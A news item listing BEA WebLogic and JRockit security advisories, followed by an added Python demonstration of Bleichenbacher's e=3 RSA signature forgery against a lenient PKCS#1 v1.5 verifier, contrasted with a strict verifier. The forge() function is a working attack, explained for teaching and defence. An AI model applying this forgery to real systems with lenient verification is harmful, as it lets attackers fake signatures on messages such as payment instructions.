Updates for vulnerabilities in several BEA WebLogic products
BEA has fixed numerous vulnerabilities in its products WebLogic Express, WebLogic Portal, WebLogic Server and JRockit. Attackers could exploit them, for instance, to read sensitive information, inject files, bypass security checks or carry out cross-site scripting attacks. Links to the individual updates are provided in the respective BEA security advisories; there is no cumulative patch.
- Requests served through WebLogic proxy servlets may acquire elevated privileges, BEA advisory
- Security policies may not be enforced on WebLogic JMS servers, BEA advisory
- WebLogic Server Embedded LDAP may be susceptible to a brute force attack, BEA advisory
- The WebLogic console may display certain Web Service sensitive attributes in clear text, BEA advisory
- Security policy may not be applied to WebLogic administration deployers when uploading archives, BEA advisory
- Patches available to prevent multiple cross-site scripting (XSS) vulnerabilities, BEA advisory
- The WLST script generated by configToScript may not encrypt sensitive attributes when creating a new domain, BEA advisory
- WebLogic JMS Message Bridge not enforcing proper credentials to access a protected queue, BEA advisory
- Cross-site scripting attacks in the WebLogic Portal Groupspace application, BEA advisory
- Inadvertent corruption of entitlements could result in unauthorized access to protected resources, BEA advisory
- An SSL port may be susceptible to a Denial of Service attack, BEA advisory
- WebLogic SSL may verify RSA Signatures incorrectly if the RSA key exponent is 3, BEA advisory
- Exposure of filenames in development mode, BEA advisory
- Non-trusted Applets may be able to exploit serialization condition to elevate privileges, advisory on BEA JRockit
- An Application started through Java Web Start may be able to elevate its privileges, advisory on BEA JRockit
- Buffer Overflow in processing GIF images, advisory on BEA JRockit
- Non-trusted Applets may be able to elevate privileges, advisory on BEA JRockit
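The item above on WebLogic SSL verifying RSA signatures incorrectly when the public exponent is 3 gives no technical detail. The following Python example is added here and is not code from BEA or from the advisory; it assumes the issue is the lenient PKCS#1 v1.5 padding check reported across many implementations in 2006 (Bleichenbacher's forgery): a verifier that parses the padding and stops once it has matched the digest, instead of checking that the digest is the last thing in the block. With e = 3 an attacker can then produce a "signature" for an arbitrary message from the public key alone by taking an integer cube root. The key generation (a seeded demo key), the sample message and all function names are the example's own.

```python
"""Lenient vs strict PKCS#1 v1.5 signature verification with e = 3.

Demo key, message and forgery construction are constructed for this example.
"""
import hashlib
import random

# DER prefix of DigestInfo for SHA-256 (RFC 8017, section 9.2, note 1).
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")
E = 3
MOD_BITS = 2048


def _is_probable_prime(n, rng, rounds=32):
    """Miller-Rabin, sufficient for a demonstration key."""
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def generate_key(bits=MOD_BITS, seed=1):
    """Demo RSA key with e = 3. Seeded only for reproducibility; never do this for real keys."""
    rng = random.Random(seed)

    def prime(half):
        while True:
            cand = rng.getrandbits(half) | (1 << (half - 1)) | 1
            # gcd(e, p-1) must be 1 for e = 3 to have an inverse mod phi(n)
            if (cand - 1) % E != 0 and _is_probable_prime(cand, rng):
                return cand

    p, q = prime(bits // 2), prime(bits // 2)
    while q == p:
        q = prime(bits // 2)
    n = p * q
    d = pow(E, -1, (p - 1) * (q - 1))
    return n, d


def _digest_info(msg):
    return SHA256_DIGESTINFO + hashlib.sha256(msg).digest()


def _encode_emsa(msg, k):
    """EMSA-PKCS1-v1_5: 00 01 FF..FF 00 || DigestInfo || H(msg), exactly k bytes."""
    t = _digest_info(msg)
    return b"\x00\x01" + b"\xff" * (k - 3 - len(t)) + b"\x00" + t


def sign(msg, n, d):
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(_encode_emsa(msg, k), "big"), d, n).to_bytes(k, "big")


def verify_strict(msg, sig, n):
    """Rebuild the expected block and compare all k bytes (RFC 8017, section 8.2.2)."""
    k = (n.bit_length() + 7) // 8
    if len(sig) != k:
        return False
    em = pow(int.from_bytes(sig, "big"), E, n).to_bytes(k, "big")
    return em == _encode_emsa(msg, k)


def verify_lenient(msg, sig, n):
    """Parses the padding: 00 01, at least eight 0xFF, 00, DigestInfo || H(msg) ...
    and never checks that the digest ends at the end of the block. That is the bug."""
    k = (n.bit_length() + 7) // 8
    em = pow(int.from_bytes(sig, "big"), E, n).to_bytes(k, "big")
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < k and em[i] == 0xFF:
        i += 1
    if i - 2 < 8 or i >= k or em[i] != 0x00:
        return False
    t = _digest_info(msg)
    return em[i + 1:i + 1 + len(t)] == t  # trailing bytes are ignored


def _icbrt(x):
    """Floor of the integer cube root, by binary search."""
    lo, hi = 0, 1 << (x.bit_length() // 3 + 2)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** 3 <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo


def forge(msg, n):
    """Bleichenbacher's e = 3 forgery: fix the prefix the lenient parser looks at, leave the
    low bytes free, and take the cube root. Uses only the public key."""
    k = (n.bit_length() + 7) // 8
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + _digest_info(msg)
    target = int.from_bytes(prefix + b"\x00" * (k - len(prefix)), "big")
    s = _icbrt(target)
    if s ** 3 < target:
        s += 1  # s^3 >= target; the error (< 3*s^2 + 3*s + 1) stays inside the free bytes
    assert s ** 3 < n  # no modular reduction, so s^3 mod n has exactly our prefix
    return s.to_bytes(k, "big")


def demo():
    n, d = generate_key()
    msg = b"transfer 100 EUR to account 42"  # constructed sample message
    good, fake = sign(msg, n, d), forge(msg, n)
    return {
        "strict_good": verify_strict(msg, good, n),
        "strict_fake": verify_strict(msg, fake, n),
        "lenient_good": verify_lenient(msg, good, n),
        "lenient_fake": verify_lenient(msg, fake, n),
    }


if __name__ == "__main__":
    print(demo())
```

The forged signature passes the lenient verifier and fails the strict one, while the genuine signature passes both. The strict verifier does not parse at all: it re-encodes the expected block and compares every byte, which is what RFC 8017 prescribes and what removes the free bytes the forgery depends on. The construction needs the free region to be larger than roughly 3 times the cube root squared of the fixed prefix, which is why it works comfortably at 2048 bits with SHA-256 and eight padding bytes; with larger public exponents the cube-root trick does not apply.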
(mba)